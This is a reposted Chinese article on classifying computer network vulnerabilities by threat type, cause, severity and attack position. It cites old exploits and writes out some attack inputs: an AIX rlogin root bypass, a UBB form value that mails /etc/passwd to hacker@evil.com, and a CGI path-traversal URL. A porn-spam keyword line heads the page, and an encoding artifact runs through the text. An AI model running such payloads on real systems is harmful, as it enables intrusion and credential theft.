欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

計(jì)算機(jī)網(wǎng)絡(luò)系統(tǒng)安全漏洞分類(lèi)研究

 更新時(shí)間:2006年11月03日 00:00:00   作者:  

寫(xiě)本文的目地是為了總結(jié)一些東西,解決在試圖構(gòu)造一個(gè)漏洞數(shù)據(jù)庫(kù)的過(guò)程中碰到的主要問(wèn)題,也就是如何對(duì)計(jì)算機(jī)網(wǎng)絡(luò)漏洞進(jìn)行分類(lèi)的問(wèn)題。文中的一些想法并不成熟,有些甚至連自己也不滿意,權(quán)作拋磚引玉,以期與在這方面有深入研究的同仁交流,共同提高完善。
一個(gè)計(jì)算機(jī)網(wǎng)絡(luò)安全漏洞有它多方面的屬性,我認(rèn)為主要可以用以下幾個(gè)方面來(lái)概括:漏洞可能造成的直接威脅,漏洞的成因,漏洞的嚴(yán)重性,漏洞被利用的方式。以下的討論將回繞這幾個(gè)方面對(duì)漏洞細(xì)分其類(lèi)。
A.按漏洞可能對(duì)系統(tǒng)造成的直接威脅
可以大致分成以下幾類(lèi),事實(shí)上一個(gè)系統(tǒng)漏洞對(duì)安全造成的威脅遠(yuǎn)不限于它的直接可能性,如果攻擊者獲得了對(duì)系統(tǒng)的一般用戶訪問(wèn)權(quán)限,他就極有可能再通過(guò)利用本地漏洞把自己升級(jí)為管理員權(quán)限:
一.遠(yuǎn)程管理員權(quán)限
攻擊者無(wú)須一個(gè)賬號(hào)登錄到本地直接獲得遠(yuǎn)程系統(tǒng)的管理員權(quán)限,通常通過(guò)攻擊以root身份執(zhí)行的有缺陷的系統(tǒng)守護(hù)進(jìn)程來(lái)完成。漏洞的絕大部分來(lái)源于緩沖區(qū)溢出,少部分來(lái)自守護(hù)進(jìn)程本身的邏輯缺陷。
典型漏洞:
IMAP4rev1 v10.190版的守護(hù)進(jìn)程imapd的AUTHENTICATE命令存在讀入?yún)?shù)時(shí)未做長(zhǎng)度檢查,構(gòu)造一個(gè)精心設(shè)計(jì)的AUTH命令串,可以溢出imapd的緩沖區(qū),執(zhí)行指定的命令,由于imapd以root身份運(yùn)行,從而直接獲得機(jī)器的root權(quán)限。
WindowsNT IIS 4.0的ISAPI DLL對(duì)輸入的URL未做適當(dāng)?shù)倪吔鐧z查,如果構(gòu)造一個(gè)超長(zhǎng)的URL,可以溢出IIS (inetinfo.exe)的緩沖區(qū),執(zhí)行我們指定的代碼。由于inetinfo.exe是以local system身份啟動(dòng),溢出后可以直接得到管理員權(quán)限。
早期AIX 3.2 rlogind代碼存在認(rèn)證邏輯缺陷,用rlogin victim.com -l -froot,可以直接以root身份登錄到系統(tǒng)而無(wú)須提供口令。
二.本地管理員權(quán)限
攻擊者在已有一個(gè)本地賬號(hào)能夠登錄到系統(tǒng)的情況下,通過(guò)攻擊本地某些有缺陷的suid程序,競(jìng)爭(zhēng)條件等手段,得到系統(tǒng)的管理員權(quán)限。
典型漏洞:
RedHat Linux的restore是個(gè)suid程序,它的執(zhí)行依靠一個(gè)中RSH的環(huán)境變量,通過(guò)設(shè)置環(huán)境變量PATH,可以使RSH變量中的可執(zhí)行程序以root身份運(yùn)行,從而獲得系統(tǒng)的root權(quán)限。
Solaris 7的Xsun程序有suid位,它對(duì)輸入?yún)?shù)未做有效的邊界檢查,可以很容易地溢出它的緩沖區(qū),以root身份運(yùn)行我們指定的代碼,從而獲得管理員權(quán)限。
在windows2000下,攻擊者就有機(jī)會(huì)讓網(wǎng)絡(luò)DDE(一種在不同的Windows機(jī)器上的應(yīng)用程序之間動(dòng)態(tài)共享數(shù)據(jù)的技術(shù))代理在本地系統(tǒng)用戶的安全上下文中執(zhí)行其指定的代碼,從而提升權(quán)限并完全控制本地機(jī)器。
三.普通用戶訪問(wèn)權(quán)限
攻擊者利用服務(wù)器的漏洞,取得系統(tǒng)的普通用戶存取權(quán)限,對(duì)UNIX類(lèi)系統(tǒng)通常是shell訪問(wèn)權(quán)限,對(duì)Windows系統(tǒng)通常是cmd.exe的訪問(wèn)權(quán)限,能夠以一般用戶的身份執(zhí)行程序,存取文件。攻擊者通常攻擊以非root身份運(yùn)行的守護(hù)進(jìn)程,有缺陷的cgi程序等手段獲得這種訪問(wèn)權(quán)限。
典型漏洞:
UBB是個(gè)廣泛運(yùn)行于各種UNIX和Windows系統(tǒng)的論壇程序,用PERL實(shí)現(xiàn),它的5.19以下版本存在輸入驗(yàn)證問(wèn)題,通過(guò)提交精心構(gòu)造的表單內(nèi)容,可以使UBB去執(zhí)行shell命令,因?yàn)橐话愕膚eb服務(wù)器以nobody身份運(yùn)行,因此可以得到一個(gè)nobody shell。比如提交這樣的數(shù)據(jù):topic='012345.ubb|mail hacker@evil.com </etc/passwd|',我們就可以得到系統(tǒng)的passwd文件。
RedHat Linux 6.2帶的innd 2.2.2.3版新聞服務(wù)器,存在緩沖區(qū)溢出漏洞,通過(guò)一個(gè)精心構(gòu)造的新聞信件可以使innd服務(wù)器以news身份運(yùn)行我們指定的代碼,得到一個(gè)innd權(quán)限的shell。
Windows IIS 4.0-5.0存在Unicode解碼漏洞,可以使攻擊者利用cmd.exe以guest組的權(quán)限在系統(tǒng)上運(yùn)行程序。相當(dāng)于取得了普通用戶的權(quán)限。
四.權(quán)限提升
攻擊者在本地通過(guò)攻擊某些有缺陷的sgid程序,把自己的權(quán)限提升到某個(gè)非root用戶的水平。獲得管理員權(quán)限可以看做是一種特殊的權(quán)限提升,只是因?yàn)橥{的大小不同而把它獨(dú)立出來(lái)。
典型漏洞:
RedHat Linux 6.1帶的man程序?yàn)閟gid man,它存在format bug,通過(guò)對(duì)它的溢出攻擊,可以使攻擊者得到man組的用戶權(quán)限。
Solaris 7的write程序?yàn)閟gid tty,它存在緩沖區(qū)溢出問(wèn)題,通過(guò)對(duì)它的攻擊可以攻擊者得到tty組的用戶權(quán)限。
WindowsNT系統(tǒng)中,攻擊者能夠使系統(tǒng)中其他用戶裝入一個(gè)”特洛化”的porfile,使其他用戶執(zhí)行攻擊者的惡意代碼,有時(shí)甚至是管理員。
五.讀取受限文件
攻擊者通過(guò)利用某些漏洞,讀取系統(tǒng)中他應(yīng)該沒(méi)有權(quán)限的文件,這些文件通常是安全相關(guān)的。這些漏洞的存在可能是文件設(shè)置權(quán)限不正確,或者是特權(quán)進(jìn)程對(duì)文件的不正確處理和意外dump core使受限文件的一部份dump到了core文件中。
典型漏洞:
SunOS 5.5的ftpd存在漏洞,一般用戶可以引起ftpd出錯(cuò)而dump出一個(gè)全局可讀的core文件,里面有shadow文件的片斷,從而使一般用戶能讀到shadow的部分內(nèi)容。
SuSE 6.2的suid程序pg,對(duì)它的配置文件處理存在問(wèn)題,當(dāng)把pb.conf鏈接到特權(quán)文件,可以用pb讀取那些文件的內(nèi)容。
Oracle 8.0.3 Enterprise Edition for NT 4.0的日志文件全局可讀而且為明文,它記錄了連接的口令,很可能被攻擊者讀到。
六.遠(yuǎn)程拒絕服務(wù)
攻擊者利用這類(lèi)漏洞,無(wú)須登錄即可對(duì)系統(tǒng)發(fā)起拒絕服務(wù)攻擊,使系統(tǒng)或相關(guān)的應(yīng)用程序崩潰或失去響應(yīng)能力。這類(lèi)漏洞通常是系統(tǒng)本身或其守護(hù)進(jìn)程有缺陷或設(shè)置不正確造成的。
早期的Linux 和 BSD的tcp/ip堆棧的ip 片斷重組模塊存在缺陷,攻擊通過(guò)向系統(tǒng)發(fā)出特殊的ip片斷包可以使機(jī)器崩潰。
Windows2000帶的Netmeeting 3.01存在缺陷,通過(guò)向它發(fā)送二進(jìn)制數(shù)據(jù)流,可以使服務(wù)器的CPU占用達(dá)到100%。
通過(guò)發(fā)送一個(gè)帶有超長(zhǎng)參數(shù)的USER命令給AnalogX Proxy Server 4.04的ftp端口,可以使這個(gè)應(yīng)用程序崩潰。
七.本地拒絕服務(wù)
在攻擊者登錄到系統(tǒng)后,利用這類(lèi)漏洞,可以使系統(tǒng)本身或應(yīng)用程序崩潰。這種漏洞主要因?yàn)槭浅绦驅(qū)σ馔馇闆r的處理失誤,如寫(xiě)臨時(shí)文件之前不檢查文件是否存在,盲目跟隨鏈接等。
BSDi 3.x存在漏洞可以使一個(gè)本地用戶用一些垃圾覆蓋系統(tǒng)上的任何,這樣會(huì)很容易地把系統(tǒng)搞成不可用。
RedHat 6.1的tmpwatch程序存在缺陷,可以使系統(tǒng)fork()出許多進(jìn)程,從而使系統(tǒng)失去響應(yīng)能力。
八.遠(yuǎn)程非授權(quán)文件存取
利用這類(lèi)漏洞,攻擊可以不經(jīng)授權(quán)地從遠(yuǎn)程存取系統(tǒng)的某些文件。這類(lèi)漏洞主要是由一些有缺陷的cgi程序引起的,它們對(duì)用戶輸入沒(méi)有做適當(dāng)?shù)暮戏ㄐ詸z查,使攻擊者通過(guò)構(gòu)造特別的輸入獲得對(duì)文件存取。
典型漏洞:
Poll_It_SSI_v2.0.cgi存在漏洞可以使攻擊者看到web目錄外的所有有權(quán)限看的文件,發(fā)送如下的請(qǐng)求給服務(wù)器就能看到/etc/passwd文件,http://www.targethost.com/pollit/Poll_It_v2.0.cgi?data_dir=\etc\passwd%00
Windows IIS 5.0存在一個(gè)漏洞,通過(guò)向它發(fā)送一個(gè)特殊的head標(biāo)記,可以得到asp源碼,而不是經(jīng)過(guò)解釋執(zhí)行后asp頁(yè)面。
Windows IE存在諸多漏洞允許惡意的web頁(yè)面讀取瀏覽用戶的本地的文件。
九.口令恢復(fù)
因?yàn)椴捎昧撕苋醯目诹罴用芊绞?,使攻擊者可以很容易的分析出口令的加密方法,從而使攻擊者通過(guò)某種方法得到密碼后還原出明文來(lái)。
典型漏洞:
Windows下的PassWD v1.2用來(lái)管理系統(tǒng)中的各種口令,并和URL一起儲(chǔ)存起來(lái)。但它加密儲(chǔ)存的口令加密方式非常脆弱,經(jīng)過(guò)簡(jiǎn)單的分析,就可以從加密后的口令還原出明文。
Pcanywhere 9.0采用非常脆弱的加密方法來(lái)加密傳輸中的口令,只要竅聽(tīng)了傳輸中的數(shù)據(jù)很容易解碼出明文口令。
Browsegate是一個(gè)Windows下的代理防火墻,它的2.80.2版本,在配置文件中儲(chǔ)存了加密后的口令而且配置文件對(duì)所有用戶是可讀的,然而加密方式極其脆弱,可以很容易地解碼出明文。
十.欺騙
利用這類(lèi)漏洞,攻擊者可以對(duì)目標(biāo)系統(tǒng)實(shí)施某種形式的欺騙。這通常是由于系統(tǒng)的實(shí)現(xiàn)上存在某些缺陷。
典型漏洞
Windows IE曾經(jīng)存在一個(gè)漏洞允許一個(gè)惡意網(wǎng)絡(luò)在另一個(gè)風(fēng)站的窗口內(nèi)插入內(nèi)容,從而欺騙用戶輸入敏感數(shù)據(jù)。
Linux kernel 2.0.35以下的tcp/ip堆棧存在漏洞,可以使攻擊者進(jìn)行ip地址欺騙非常容易實(shí)現(xiàn)。
十一.服務(wù)器信息泄露
利用這類(lèi)漏洞,攻擊者可以收集到對(duì)于進(jìn)一步攻擊系統(tǒng)有用的信息。這類(lèi)漏洞的產(chǎn)生主要是因?yàn)橄到y(tǒng)程序有缺陷,一般是對(duì)錯(cuò)誤的不正確處理。
典型漏洞:
Windows IIS 3.0-5.0存在漏洞,當(dāng)向系統(tǒng)請(qǐng)求不存在的.idq,.idq文件時(shí),機(jī)器可能會(huì)返回出錯(cuò)信息,里面暴露了IIS的安裝目錄信息,比如請(qǐng)求http://www.microsoft.com/anything.ida,服務(wù)器會(huì)返回Response: The IDQ file d:\http\anything.ida could not be found。這些對(duì)攻擊者進(jìn)行攻擊可能帶來(lái)方便,比如廣泛流行的msadc的攻擊,需要知道系統(tǒng)的安裝目錄。
Linux kernel 2.1.53以下的tcp/ip堆棧開(kāi)放和關(guān)閉的端口對(duì)特定的數(shù)據(jù)包有特定的回應(yīng),攻擊者可以利用這個(gè)特性進(jìn)行端口的秘密掃描。
某些cgi程序如DBMan (db.cgi)存在漏洞可以使攻擊者看到一些系統(tǒng)的環(huán)境變量,使攻擊者獲得關(guān)于系統(tǒng)一些有用的信息。
十二.其它
雖然以上的幾種分類(lèi)包括了絕大多數(shù)的漏洞情況,可還是有可能存在一些上面幾種類(lèi)型無(wú)法描述的的漏洞,把它們歸到這里。
B.按漏洞的成因
對(duì)其分類(lèi),是對(duì)漏洞進(jìn)行分類(lèi)最另人頭疼的一個(gè)方面,因?yàn)閷?duì)漏洞研究的不同抽象層次,會(huì)對(duì)同一個(gè)漏洞做出不同的分類(lèi),對(duì)下面提到的ps競(jìng)爭(zhēng)條件漏洞,從最低層次上來(lái)說(shuō)是參數(shù)驗(yàn)證錯(cuò)誤,因?yàn)橄嗬^的系統(tǒng)調(diào)用并沒(méi)有檢查他們所處理的是否為同一個(gè)對(duì)象,從高一些的層次看,這是一個(gè)同步或競(jìng)爭(zhēng)條件錯(cuò)誤,從更高的層次看,這則是一個(gè)邏輯錯(cuò)誤,因?yàn)閷?duì)象可能在使用過(guò)程中被刪除。至今也沒(méi)看到一個(gè)比較完美分類(lèi)方案,包括securityfocus上的分類(lèi)也不能讓人滿意,現(xiàn)大致分成以下幾類(lèi):
輸入驗(yàn)證錯(cuò)誤
大多數(shù)的緩沖區(qū)溢出漏洞和cgi類(lèi)漏洞都是由于未對(duì)用戶提供的輸入數(shù)據(jù)的合法性作適當(dāng)?shù)臋z查。
訪問(wèn)驗(yàn)證錯(cuò)誤
漏洞的產(chǎn)生是由于程序的訪問(wèn)驗(yàn)證部分存在某些可利用的邏輯錯(cuò)誤,使繞過(guò)這種訪問(wèn)控制成為可能。上面提到的那個(gè)早期AIX的rlogin漏洞就是這種典型。
競(jìng)爭(zhēng)條件
漏洞的產(chǎn)生在于程序處理文件等實(shí)體時(shí)在時(shí)序和同步方面存在問(wèn)題,這處理的過(guò)程中可能存在一個(gè)機(jī)會(huì)窗口使攻擊者能夠施以外來(lái)的影響。早期的Solaris系統(tǒng)的ps命令存在這種類(lèi)型的漏洞,ps在執(zhí)行的時(shí)候會(huì)在/tmp產(chǎn)生一個(gè)基于它pid的臨時(shí)文件,然后把它c(diǎn)hown為root,改名為ps_data。如果在ps運(yùn)行時(shí)能夠創(chuàng)建這個(gè)臨時(shí)文件指向我們有興趣的文件,這樣ps執(zhí)行以后,我們就可以對(duì)這個(gè)root擁有文件做任意的修改,這可以幫助我們獲得root權(quán)限。
意外情況處置錯(cuò)誤
漏洞的產(chǎn)生在于程序在它的實(shí)現(xiàn)邏輯中沒(méi)有考慮到一些意外情況,而這些意外情況是應(yīng)該被考慮到的。大多數(shù)的/tmp目錄中的盲目跟隨符號(hào)鏈接覆蓋文件的漏洞屬于這種類(lèi)型。例子:Sco UNIX openserver的/etc/sysadm.d/bin/userOsa存在盲目覆蓋調(diào)試日志文件的問(wèn)題,而文件的名字是固定的,通過(guò)把文件名指向某些特權(quán)文件,可以完全破壞系統(tǒng)。
設(shè)計(jì)錯(cuò)誤
這個(gè)類(lèi)別是非?;\統(tǒng)的,嚴(yán)格來(lái)說(shuō),大多數(shù)的漏洞的存在都是設(shè)計(jì)錯(cuò)誤,因此所有暫時(shí)無(wú)法放入到其他類(lèi)別的漏洞,先放在這。
配置錯(cuò)誤
漏洞的產(chǎn)生在于系統(tǒng)和應(yīng)用的配置有誤,或是軟件安裝在錯(cuò)誤的地方,或是錯(cuò)誤的配置參數(shù),或是錯(cuò)誤的訪問(wèn)權(quán)限,策略錯(cuò)誤。
環(huán)境錯(cuò)誤
由一些環(huán)境變量的錯(cuò)誤或惡意設(shè)置造成的漏洞。如攻擊者可能通過(guò)重置shell的內(nèi)部分界符IFS,shell的轉(zhuǎn)義字符,或其它環(huán)境變量,導(dǎo)致有問(wèn)題的特權(quán)程序去執(zhí)行攻擊者指定的程序。上面提到的RedHat Linux的dump程序漏洞就是這種類(lèi)型。
在漏洞的威脅類(lèi)型和產(chǎn)生漏洞的錯(cuò)誤類(lèi)型之間存在一定的聯(lián)系,有直接聯(lián)系的威脅類(lèi)型與錯(cuò)誤類(lèi)型用直線相連,可以看到如下的圖示:
遠(yuǎn)程管理員權(quán)限        
                    輸入驗(yàn)證錯(cuò)誤
本地管理員權(quán)限
                     訪問(wèn)驗(yàn)證錯(cuò)誤
普通用戶訪問(wèn)權(quán)限
                    競(jìng)爭(zhēng)條件
權(quán)限提升                    意外情況處置錯(cuò)誤
讀取受限文件                  
遠(yuǎn)程拒絕服務(wù)                   設(shè)計(jì)錯(cuò)誤
本地拒絕服務(wù)                     
遠(yuǎn)程非授權(quán)文件存取
                   配置錯(cuò)誤
口令恢復(fù)                        
欺騙                    環(huán)境錯(cuò)誤
服務(wù)器信息泄露                  
可以看到輸入驗(yàn)證錯(cuò)誤幾乎與所有的漏洞威脅有關(guān),設(shè)計(jì)錯(cuò)誤與錯(cuò)誤的配置也會(huì)導(dǎo)致很多威脅。
  C.對(duì)漏洞嚴(yán)重性的分級(jí)
一般來(lái)說(shuō)漏洞的威脅類(lèi)型基本上決定了它的嚴(yán)重性,我們可以把嚴(yán)重性分成高,中,低三個(gè)級(jí)別。遠(yuǎn)程和本地管理員權(quán)限大致對(duì)應(yīng)為高,普通用戶權(quán)限,權(quán)限提升,讀取受限文件,遠(yuǎn)程和本地拒絕服務(wù)大致對(duì)應(yīng)中級(jí),遠(yuǎn)程非授權(quán)文件存取,口令恢復(fù),欺騙,服務(wù)器信息泄露大致對(duì)應(yīng)低級(jí)別。但這只是最一般的情況,很多時(shí)候需要具體情況具體分析,如一個(gè)涉及到針對(duì)流行系統(tǒng)本身的遠(yuǎn)程拒絕服務(wù)漏洞,就應(yīng)該是高級(jí)別。同樣一個(gè)被廣泛使用的軟件如果存在弱口令問(wèn)題,有口令恢復(fù)漏洞,也應(yīng)該歸為中高級(jí)別。
D.對(duì)漏洞被利用方式的分類(lèi)
漏洞的存在是個(gè)客觀事實(shí),但漏洞只能以一定的方式被利用,每個(gè)漏洞都要求攻擊處于網(wǎng)絡(luò)空間一個(gè)特定的位置,可能的攻擊方式分為以下四類(lèi):
物理接觸
攻擊者需要能夠物理地接觸目標(biāo)系統(tǒng)才能利用這類(lèi)漏洞,對(duì)系統(tǒng)的安全構(gòu)成威脅。圖示:                            
       攻擊者             主機(jī)                               
主機(jī)模式
通常的漏洞利用方式。攻擊方為客戶機(jī),被攻擊方為目標(biāo)主機(jī)。比如攻擊者發(fā)現(xiàn)目標(biāo)主機(jī)的某個(gè)守護(hù)進(jìn)程存在一個(gè)遠(yuǎn)程溢出漏洞,攻擊者可能因此取得主機(jī)的額外訪問(wèn)權(quán)。
    圖示: 
                攻擊           攻擊機(jī)器         主機(jī)   
客戶機(jī)模式
當(dāng)一個(gè)用戶訪問(wèn)網(wǎng)絡(luò)上的一個(gè)主機(jī),他就可能遭到主機(jī)發(fā)送給自己惡意命令的襲擊??蛻魴C(jī)不應(yīng)該過(guò)度信任主機(jī)。如web瀏覽器IE存在不少漏洞,可以使一些惡意的網(wǎng)站用html標(biāo)記通過(guò)那些漏洞在瀏覽的客戶機(jī)中執(zhí)行程序或讀寫(xiě)文件。
    圖示:
                 攻擊
          客戶機(jī)          主機(jī)         

中間人方式
當(dāng)攻擊者位于一個(gè)可以觀察或截獲兩個(gè)機(jī)器之間的通信的位置時(shí),就可以認(rèn)為攻擊者處于中間人方式。因?yàn)楹芏鄷r(shí)候主機(jī)之間以明文方式傳輸有價(jià)值的信息,因此攻擊者可以很容易地攻入其他機(jī)器。對(duì)于某些公鑰加密的實(shí)現(xiàn),攻擊者可以截獲并取代密鑰偽裝成網(wǎng)絡(luò)上的兩個(gè)節(jié)點(diǎn)來(lái)繞過(guò)這種限制。
  圖示:
              通信
       主機(jī)             主機(jī)         
   
竅聽(tīng)或篡改

              攻擊者     

本文對(duì)網(wǎng)絡(luò)安全漏洞作了粗淺地分類(lèi),這遠(yuǎn)不是一個(gè)完美的方案,有興趣的歡迎來(lái)信交流心得。
一些我讀過(guò)的參考資料: http://www.securityfocus.com/external/http://seclab.cs.ucdavis.edu/projects/vulnerabilities/scriv/index.html http://www.securityfocus.com/external/http://seclab.cs.ucdavis.edu/projects/vulnerabilities/scriv/index.html http://www.securityfocus.com/external/http://seclab.cs.ucdavis.edu/projects/vulnerabilities/scriv/index.html
http://www.securityfocus.com/data/library/compvuln_draft.pdf
當(dāng)然還有:
http://www.xfocus.org/html/query_exploit.html
你能在那找到文中所舉的所有漏洞例子

相關(guān)文章

  • 遠(yuǎn)程控制技術(shù)的應(yīng)用

    遠(yuǎn)程控制技術(shù)的應(yīng)用

    遠(yuǎn)程控制技術(shù)的應(yīng)用...
    2006-11-11
  • 保存網(wǎng)頁(yè)圖片的八種方法

    保存網(wǎng)頁(yè)圖片的八種方法

    保存網(wǎng)頁(yè)圖片的八種方法...
    2006-11-11
  • 讓普通QQ號(hào)也能克隆QQ好友

    讓普通QQ號(hào)也能克隆QQ好友

    相信大家手頭都有幾個(gè)備用的QQ號(hào)吧,一般都是在當(dāng)初QQ免費(fèi)注冊(cè)的時(shí)候弄來(lái)的,但是有時(shí)候因?yàn)槟承┰?,突然要把一個(gè)QQ上的好友完全克隆到另外一個(gè)QQ上面,這個(gè)“龐大工程”我想一般人是沒(méi)有時(shí)間,也沒(méi)有精力去完成它的。您先不用著急羨慕QQ會(huì)員的克隆好友功能,我們自己動(dòng)手,照樣可以完成這個(gè)“不可能的任務(wù)”!
    2008-05-05
  • 加快Windows 2000訪問(wèn)網(wǎng)上鄰居的速度

    加快Windows 2000訪問(wèn)網(wǎng)上鄰居的速度

    加快Windows 2000訪問(wèn)網(wǎng)上鄰居的速度...
    2006-11-11
  • 菜鳥(niǎo)網(wǎng)賺高級(jí)技巧

    菜鳥(niǎo)網(wǎng)賺高級(jí)技巧

    各位互聯(lián)網(wǎng)的菜鳥(niǎo)朋友們,你們是否覺(jué)的互聯(lián)上賺錢(qián)不可能?哪賺錢(qián)需要哪些條件呢?有人說(shuō),必須得要網(wǎng)站,有人說(shuō)得會(huì)編程序,但實(shí)際賺錢(qián)真的很簡(jiǎn)單,找一 個(gè)好方法比這些都來(lái)的快, 最近呢 我發(fā)現(xiàn)一個(gè)聯(lián)盟是比較不錯(cuò)的,這個(gè)聯(lián)盟里賺錢(qián)呢,是不需要網(wǎng)站,不需要會(huì)編程,哪要什么呢?
    2008-05-05
  • 什么是blog(轉(zhuǎn))

    什么是blog(轉(zhuǎn))

    什么是blog(轉(zhuǎn))...
    2006-12-12
  • 給IE加個(gè)參數(shù) 永遠(yuǎn)不怕IE主頁(yè)被修改

    給IE加個(gè)參數(shù) 永遠(yuǎn)不怕IE主頁(yè)被修改

    眾所周知,修改IE默認(rèn)主頁(yè)地址是惡意網(wǎng)頁(yè)常用的一招。IE被修改后,會(huì)自動(dòng)連接到惡意網(wǎng)頁(yè)的地址。大家常用的方法是修改注冊(cè)表,其實(shí),只要簡(jiǎn)單給IE加個(gè)參數(shù),就再也不怕IE主頁(yè)地址被修改了。下面是具體的步驟。
    2008-04-04
  • 金山反病毒20050126_日?qǐng)?bào)

    金山反病毒20050126_日?qǐng)?bào)

    金山反病毒20050126_日?qǐng)?bào)...
    2006-11-11
  • 局域網(wǎng)故障維護(hù)及優(yōu)化技巧

    局域網(wǎng)故障維護(hù)及優(yōu)化技巧

    局域網(wǎng)故障維護(hù)及優(yōu)化技巧...
    2006-11-11
  • 主頁(yè)木馬的制作方法

    主頁(yè)木馬的制作方法

    主頁(yè)木馬的制作方法...
    2006-11-11

最新評(píng)論